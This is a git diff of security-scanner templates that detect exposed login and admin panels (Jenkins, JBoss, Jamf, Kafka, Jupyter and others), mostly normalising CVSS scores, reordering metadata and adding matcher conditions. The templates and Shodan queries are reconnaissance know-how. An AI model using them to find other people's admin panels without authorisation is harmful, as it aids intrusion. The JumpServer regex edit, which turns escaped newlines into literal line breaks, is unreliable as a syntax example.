-22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: header words: diff --git a/http/exposed-panels/icinga-web-login.yaml b/http/exposed-panels/icinga-web-login.yaml index 70c7244c95..fbcfe02ade 100644 --- a/http/exposed-panels/icinga-web-login.yaml +++ b/http/exposed-panels/icinga-web-login.yaml @@ -7,7 +7,7 @@ info: description: Icinga Web 2 login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,6 +24,7 @@ http: - type: word words: - "Icinga Web 2 Login" + - type: status status: - 200 diff --git a/http/exposed-panels/iclock-admin-panel.yaml b/http/exposed-panels/iclock-admin-panel.yaml index cdebe0d9d6..02c09d9984 100644 --- a/http/exposed-panels/iclock-admin-panel.yaml +++ b/http/exposed-panels/iclock-admin-panel.yaml @@ -8,9 +8,9 @@ info: classification: cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"iClock Automatic" - verified: true tags: panel,iclock,login,admin http: @@ -22,6 +22,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/ictprotege-login-panel.yaml b/http/exposed-panels/ictprotege-login-panel.yaml index a096121060..74f211a246 100644 --- a/http/exposed-panels/ictprotege-login-panel.yaml +++ b/http/exposed-panels/ictprotege-login-panel.yaml @@ -4,14 +4,14 @@ info: name: ICT Protege WX Login Panel - Detect author: ritikchaddha severity: info - metadata: - max-request: 1 - verified: true - shodan-query: title:"ICT Protege WX®" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: title:"ICT Protege WX®" tags: panel,ictprotege http: diff --git a/http/exposed-panels/identity-services-engine.yaml b/http/exposed-panels/identity-services-engine.yaml index 830bde065d..789f52218c 100644 --- a/http/exposed-panels/identity-services-engine.yaml +++ b/http/exposed-panels/identity-services-engine.yaml @@ -7,7 +7,7 @@ info: description: Cisco Identity Services Engine admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 diff --git a/http/exposed-panels/ilch-admin-panel.yaml b/http/exposed-panels/ilch-admin-panel.yaml index b6c9a1098f..fb830106a2 100644 --- a/http/exposed-panels/ilch-admin-panel.yaml +++ b/http/exposed-panels/ilch-admin-panel.yaml @@ -7,11 +7,11 @@ info: description: Ilch CMS admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Ilch" tags: panel,ilch,cms diff --git a/http/exposed-panels/ilias-panel.yaml b/http/exposed-panels/ilias-panel.yaml index 5d7477e041..236faf5d34 100644 --- a/http/exposed-panels/ilias-panel.yaml +++ b/http/exposed-panels/ilias-panel.yaml @@ -7,11 +7,11 @@ info: description: ILIAS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"ILIAS" tags: panel,ilias @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/ilias/login.php" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/incapptic-connect-panel.yaml b/http/exposed-panels/incapptic-connect-panel.yaml index 62674ecced..ad71ce71bc 100644 --- a/http/exposed-panels/incapptic-connect-panel.yaml +++ b/http/exposed-panels/incapptic-connect-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.ivanti.com/products/incapptic-connect classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -27,6 +27,7 @@ http: host-redirects: true max-redirects: 3 stop-at-first-match: true + matchers-condition: or matchers: - type: dsl diff --git a/http/exposed-panels/influxdb-panel.yaml b/http/exposed-panels/influxdb-panel.yaml index 2290e4c7e0..526523a7ae 100644 --- a/http/exposed-panels/influxdb-panel.yaml +++ b/http/exposed-panels/influxdb-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.influxdata.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/intelbras-login.yaml b/http/exposed-panels/intelbras-login.yaml index bd07adcd24..1d5ff39ac1 100644 --- a/http/exposed-panels/intelbras-login.yaml +++ b/http/exposed-panels/intelbras-login.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7272 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/intelbras-panel.yaml b/http/exposed-panels/intelbras-panel.yaml index 61284c784e..db93beaf9c 100644 --- a/http/exposed-panels/intelbras-panel.yaml +++ b/http/exposed-panels/intelbras-panel.yaml @@ -7,11 +7,11 @@ info: description: Intelbras router panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Intelbras" fofa-query: app="Intelbras" tags: panel,intelbras diff --git a/http/exposed-panels/intellian-aptus-panel.yaml b/http/exposed-panels/intellian-aptus-panel.yaml index 8c43db6d60..35cce05775 100644 --- a/http/exposed-panels/intellian-aptus-panel.yaml +++ b/http/exposed-panels/intellian-aptus-panel.yaml @@ -7,7 +7,7 @@ info: description: Intelllian Aptus Web login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex @@ -36,4 +37,4 @@ http: part: body group: 1 regex: - - "Intellian Aptus Web (.*)" + - 'Intellian Aptus Web (.*)' diff --git a/http/exposed-panels/intelliflash-login-panel.yaml b/http/exposed-panels/intelliflash-login-panel.yaml index e75da56479..2d7765563b 100644 --- a/http/exposed-panels/intelliflash-login-panel.yaml +++ b/http/exposed-panels/intelliflash-login-panel.yaml @@ -7,11 +7,11 @@ info: description: IntelliFlash login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,intelliflash metadata: max-request: 1 + tags: panel,intelliflash http: - method: GET diff --git a/http/exposed-panels/interactsoftware-interact.yaml b/http/exposed-panels/interactsoftware-interact.yaml index b2ab17f1a5..f8d14cbe8b 100644 --- a/http/exposed-panels/interactsoftware-interact.yaml +++ b/http/exposed-panels/interactsoftware-interact.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.interactsoftware.com metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,interactsoftware,interact,detect http: @@ -19,6 +19,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/iomega-emc-shared-nas.yaml b/http/exposed-panels/iomega-emc-shared-nas.yaml index cbfc856222..cd7eaf7e18 100644 --- a/http/exposed-panels/iomega-emc-shared-nas.yaml +++ b/http/exposed-panels/iomega-emc-shared-nas.yaml @@ -7,11 +7,11 @@ info: description: Iomega LenovoEMC NAS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET diff --git a/http/exposed-panels/ipdiva-mediation-panel.yaml b/http/exposed-panels/ipdiva-mediation-panel.yaml index d4202aa024..8d6ba464b5 100644 --- a/http/exposed-panels/ipdiva-mediation-panel.yaml +++ b/http/exposed-panels/ipdiva-mediation-panel.yaml @@ -7,11 +7,11 @@ info: description: IPdiva Mediation login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.html:"IPdiva" tags: panel,ipdiva,mediation @@ -25,6 +25,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/iptime-router.yaml b/http/exposed-panels/iptime-router.yaml index 1bc9445571..166dc2c344 100644 --- a/http/exposed-panels/iptime-router.yaml +++ b/http/exposed-panels/iptime-router.yaml @@ -9,11 +9,11 @@ info: - http://pierrekim.github.io/blog/2015-07-01-poc-with-RCE-against-127-iptime-router-models.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,login,iptime,router metadata: max-request: 1 + tags: panel,login,iptime,router http: - method: GET diff --git a/http/exposed-panels/isams-panel.yaml b/http/exposed-panels/isams-panel.yaml index b7bda16aa9..0831cc7be3 100644 --- a/http/exposed-panels/isams-panel.yaml +++ b/http/exposed-panels/isams-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.isams.com/platform/the-platform metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-81573405 tags: panel,isams,login @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/issabel-login.yaml b/http/exposed-panels/issabel-login.yaml index 3f9c788933..364b36997f 100644 --- a/http/exposed-panels/issabel-login.yaml +++ b/http/exposed-panels/issabel-login.yaml @@ -7,7 +7,7 @@ info: description: Issabel login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/istat-panel-detect.yaml b/http/exposed-panels/istat-panel-detect.yaml index 77205fa97f..66b5b9f33d 100644 --- a/http/exposed-panels/istat-panel-detect.yaml +++ b/http/exposed-panels/istat-panel-detect.yaml @@ -7,11 +7,11 @@ info: description: Abbott i-STAT login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,abbott,istat metadata: max-request: 1 + tags: panel,abbott,istat http: - method: GET diff --git a/http/exposed-panels/itop-panel.yaml b/http/exposed-panels/itop-panel.yaml index 263a38170e..08c2607340 100644 --- a/http/exposed-panels/itop-panel.yaml +++ b/http/exposed-panels/itop-panel.yaml @@ -7,11 +7,11 @@ info: description: Combodo iTop login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,itop metadata: max-request: 2 + tags: panel,itop http: - method: GET diff --git a/http/exposed-panels/ixbus/ixbusweb-version.yaml b/http/exposed-panels/ixbus/ixbusweb-version.yaml index 74ac40972e..2aff4f542c 100644 --- a/http/exposed-panels/ixbus/ixbusweb-version.yaml +++ b/http/exposed-panels/ixbus/ixbusweb-version.yaml @@ -7,7 +7,7 @@ info: description: iXBus login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/ixcache-panel.yaml b/http/exposed-panels/ixcache-panel.yaml index 4f226ba71a..f633d3882d 100644 --- a/http/exposed-panels/ixcache-panel.yaml +++ b/http/exposed-panels/ixcache-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.panabit.com/cn/product/iXCache/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/jamf-login.yaml b/http/exposed-panels/jamf-login.yaml index dd86f17019..d07c5c0b6f 100644 --- a/http/exposed-panels/jamf-login.yaml +++ b/http/exposed-panels/jamf-login.yaml @@ -7,11 +7,11 @@ info: description: Jamf Pro login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Jamf Pro" tags: panel,jamf @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/exposed-panels/jamf-panel.yaml b/http/exposed-panels/jamf-panel.yaml index 82ddc70fa2..b506af006c 100644 --- a/http/exposed-panels/jamf-panel.yaml +++ b/http/exposed-panels/jamf-panel.yaml @@ -7,7 +7,7 @@ info: description: Jamf Mobile Device Management login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/jamf-setup-assistant.yaml b/http/exposed-panels/jamf-setup-assistant.yaml index d5c17d00c7..140a75ebf1 100644 --- a/http/exposed-panels/jamf-setup-assistant.yaml +++ b/http/exposed-panels/jamf-setup-assistant.yaml @@ -7,11 +7,11 @@ info: description: Jamf Pro Setup Assistant panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Jamf Pro Setup" tags: jamf,setup,panel diff --git a/http/exposed-panels/jaspersoft-panel.yaml b/http/exposed-panels/jaspersoft-panel.yaml index e084d68da7..a0c9d48914 100644 --- a/http/exposed-panels/jaspersoft-panel.yaml +++ b/http/exposed-panels/jaspersoft-panel.yaml @@ -7,7 +7,7 @@ info: description: TIBCO Jaspersoft login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/jasperserver-pro/login.html?error=1" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/jboss/jboss-jbpm-admin.yaml b/http/exposed-panels/jboss/jboss-jbpm-admin.yaml index bef0680237..b840c8bc17 100644 --- a/http/exposed-panels/jboss/jboss-jbpm-admin.yaml +++ b/http/exposed-panels/jboss/jboss-jbpm-admin.yaml @@ -9,11 +9,11 @@ info: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"JBossWS" tags: jboss,panel,login diff --git a/http/exposed-panels/jboss/jboss-juddi.yaml b/http/exposed-panels/jboss/jboss-juddi.yaml index c822a45e65..fb9adb094b 100644 --- a/http/exposed-panels/jboss/jboss-juddi.yaml +++ b/http/exposed-panels/jboss/jboss-juddi.yaml @@ -7,15 +7,15 @@ info: description: | The jUDDI (Java Universal Description, Discovery and Integration) Registry is a core component of the JBoss Enterprise SOA Platform. It is the product's default service registry and comes included as part of the product. In it are stored the addresses (end-point references) of all the services connected to the Enterprise Service Bus. It was implemented in JAXR and conforms to the UDDI specifications. remediation: Restrict access to the service if not needed. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossJuddi.java + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"JBoss WS" tags: panel,jboss,juddi @@ -26,6 +26,7 @@ http: - "{{BaseURL}}/juddi/" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/jboss/jboss-soa-platform.yaml b/http/exposed-panels/jboss/jboss-soa-platform.yaml index 65b45f2ba4..4998eea18f 100644 --- a/http/exposed-panels/jboss/jboss-soa-platform.yaml +++ b/http/exposed-panels/jboss/jboss-soa-platform.yaml @@ -7,11 +7,11 @@ info: description: JBoss SOA Platform login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Welcome to the JBoss SOA Platform" tags: panel,jboss,soa diff --git a/http/exposed-panels/jboss/jmx-console.yaml b/http/exposed-panels/jboss/jmx-console.yaml index 66ca6003af..c395fa4084 100644 --- a/http/exposed-panels/jboss/jmx-console.yaml +++ b/http/exposed-panels/jboss/jmx-console.yaml @@ -7,16 +7,17 @@ info: description: JBoss JMX Management Console login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,jmx,jboss metadata: max-request: 1 + tags: panel,jmx,jboss http: - method: GET path: - '{{BaseURL}}/jmx-console/' + matchers: - type: word words: diff --git a/http/exposed-panels/jboss/wildfly-panel.yaml b/http/exposed-panels/jboss/wildfly-panel.yaml index 9f545d4944..389e544421 100644 --- a/http/exposed-panels/jboss/wildfly-panel.yaml +++ b/http/exposed-panels/jboss/wildfly-panel.yaml @@ -7,11 +7,11 @@ info: description: WildFly welcome page was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,jboss,wildfly metadata: max-request: 1 + tags: panel,jboss,wildfly http: - method: GET diff --git a/http/exposed-panels/jcms-panel.yaml b/http/exposed-panels/jcms-panel.yaml index 991c218f53..7bf3dd55f3 100644 --- a/http/exposed-panels/jcms-panel.yaml +++ b/http/exposed-panels/jcms-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.jalios.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"Jalios JCMS" tags: panel,jalios,jcms @@ -26,6 +26,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/jedox-web-panel.yaml b/http/exposed-panels/jedox-web-panel.yaml index b15c895634..455283290c 100644 --- a/http/exposed-panels/jedox-web-panel.yaml +++ b/http/exposed-panels/jedox-web-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.jedox.com metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Jedox Web - Login" google-query: intitle:"Jedox Web Login" tags: panel,jedox,detect @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/jeedom-panel.yaml b/http/exposed-panels/jeedom-panel.yaml index 62100773bc..87d10dbf73 100644 --- a/http/exposed-panels/jeedom-panel.yaml +++ b/http/exposed-panels/jeedom-panel.yaml @@ -7,7 +7,7 @@ info: description: Jeedom login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/jellyseerr-login-panel.yaml b/http/exposed-panels/jellyseerr-login-panel.yaml index 1cbcc78ba3..e15df78f5e 100644 --- a/http/exposed-panels/jellyseerr-login-panel.yaml +++ b/http/exposed-panels/jellyseerr-login-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/Fallenbagel/jellyseerr metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:-2017604252 tags: panel,jellyseerr,detect @@ -21,6 +21,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/jenkins-api-panel.yaml b/http/exposed-panels/jenkins-api-panel.yaml index 69754558a2..3e094aa545 100644 --- a/http/exposed-panels/jenkins-api-panel.yaml +++ b/http/exposed-panels/jenkins-api-panel.yaml @@ -7,11 +7,11 @@ info: description: Jenkins API panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,api,jenkins metadata: max-request: 1 + tags: panel,api,jenkins http: - method: GET diff --git a/http/exposed-panels/jenkins-login.yaml b/http/exposed-panels/jenkins-login.yaml index ade4356e7d..f7f59d0325 100644 --- a/http/exposed-panels/jenkins-login.yaml +++ b/http/exposed-panels/jenkins-login.yaml @@ -5,24 +5,26 @@ info: author: pdteam severity: info description: Jenkins is an open source automation server. + remediation: Ensure proper access. reference: - https://www.jenkins.io/doc/book/security/ classification: cwe-id: CWE-200 - remediation: Ensure proper access. - tags: panel,jenkins metadata: max-request: 1 + tags: panel,jenkins http: - method: GET path: - '{{BaseURL}}/login' + matchers-condition: and matchers: - type: word words: - 'Sign in [Jenkins]' + - type: status status: - 200 diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index deae3f83d3..5c51fde059 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6797 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,jfrog,edb metadata: max-request: 1 + tags: panel,jfrog,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'JFrog' + - type: status status: - 200 diff --git a/http/exposed-panels/joget/joget-panel.yaml b/http/exposed-panels/joget/joget-panel.yaml index ad6342e118..07fdf868a0 100644 --- a/http/exposed-panels/joget/joget-panel.yaml +++ b/http/exposed-panels/joget/joget-panel.yaml @@ -7,7 +7,7 @@ info: description: Joget panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/joomla-panel.yaml b/http/exposed-panels/joomla-panel.yaml index 59bd32dc54..dde21954ff 100644 --- a/http/exposed-panels/joomla-panel.yaml +++ b/http/exposed-panels/joomla-panel.yaml @@ -4,14 +4,15 @@ info: name: Joomla! Panel author: its0x08 severity: info - tags: panel,joomla metadata: max-request: 1 + tags: panel,joomla http: - method: GET path: - "{{BaseURL}}/administrator/" + matchers: - type: word words: diff --git a/http/exposed-panels/jorani-panel.yaml b/http/exposed-panels/jorani-panel.yaml index 21b58afd90..e3686fe9e3 100644 --- a/http/exposed-panels/jorani-panel.yaml +++ b/http/exposed-panels/jorani-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"Login - Jorani" - verified: true tags: panel,jorani,login http: @@ -23,6 +23,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/jsherp-boot-panel.yaml b/http/exposed-panels/jsherp-boot-panel.yaml index 755d0b82e5..88dd78d39f 100644 --- a/http/exposed-panels/jsherp-boot-panel.yaml +++ b/http/exposed-panels/jsherp-boot-panel.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1298131932 tags: panel,jsherp,login,detect diff --git a/http/exposed-panels/jumpserver-panel.yaml b/http/exposed-panels/jumpserver-panel.yaml index 9f7d358478..e8dbdcc325 100644 --- a/http/exposed-panels/jumpserver-panel.yaml +++ b/http/exposed-panels/jumpserver-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.jumpserver.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:'JumpServer' zoomeye-query: title:'JumpServer' tags: panel,jumpserver @@ -29,8 +29,16 @@ http: - type: regex part: body regex: - - "(?i)(\n.*)JumpServer Open Source Bastion Host(\n.*)" - - "(?i)(\n.*)JumpServer 开源堡垒机(\n.*)" + - "(?i)( + + .*)JumpServer Open Source Bastion Host( + + .*)" + - "(?i)( + + .*)JumpServer 开源堡垒机( + + .*)" condition: or - type: status diff --git a/http/exposed-panels/jupyter-notebook.yaml b/http/exposed-panels/jupyter-notebook.yaml index d643820c01..0154333c5a 100644 --- a/http/exposed-panels/jupyter-notebook.yaml +++ b/http/exposed-panels/jupyter-notebook.yaml @@ -10,7 +10,7 @@ info: - https://www.exploit-db.com/ghdb/7970 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 4 @@ -28,6 +28,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/kafka-center-login.yaml b/http/exposed-panels/kafka-center-login.yaml index bda1b8c30c..847cb2e79a 100644 --- a/http/exposed-panels/kafka-center-login.yaml +++ b/http/exposed-panels/kafka-center-login.yaml @@ -7,7 +7,7 @@ info: description: Apache Kafka Control Center login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/kafka-connect-ui.yaml b/http/exposed-panels/kafka-connect-ui.yaml index 1111a6243e..724287d1ce 100644 --- a/http/exposed-panels/kafka-connect-ui.yaml +++ b/http/exposed-panels/kafka-connect-ui.yaml @@ -7,11 +7,11 @@ info: description: Apache Kafka Connect UI login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,kafka,apache metadata: max-request: 1 + tags: panel,kafka,apache http: - method: GET diff --git a/http/exposed-panels/kafka-consumer-monitor.yaml b/http/exposed-panels/kafka-consumer-monitor.yaml index 90317e164b..084e302a79 100644 --- a/http/exposed-panels/kafka-consumer-monitor.yaml +++ b/http/exposed-panels/kafka-consumer-monitor.yaml @@ -7,7 +7,7 @@ info: description: Apache Kafka Consumer Offset Monitor panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/kafka-monitoring.yaml b/http/exposed-panels/kafka-monitoring.yaml index 4fe33467e7..7eda4e9e57 100644 --- a/http/exposed-panels/kafka-monitoring.yaml +++ b/http/exposed-panels/kafka-monitoring.yaml @@ -7,11 +7,11 @@ info: description: Apache Kafka Monitor login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,kafka,apache metadata: max-request: 1 + tags: panel,kafka,apache http: - method: GET diff --git a/http/exposed-panels/kafka-topics-ui.yaml b/http/exposed-panels/kafka-topics-ui.yaml index c17f456c70..6650a42a6d 100644 --- a/http/exposed-panels/kafka-topics-ui.yaml +++ b/http/exposed-panels/kafka-topics-ui.yaml @@ -7,11 +7,11 @@ info: description: Apache Kafka Topics panel was detected. classification: 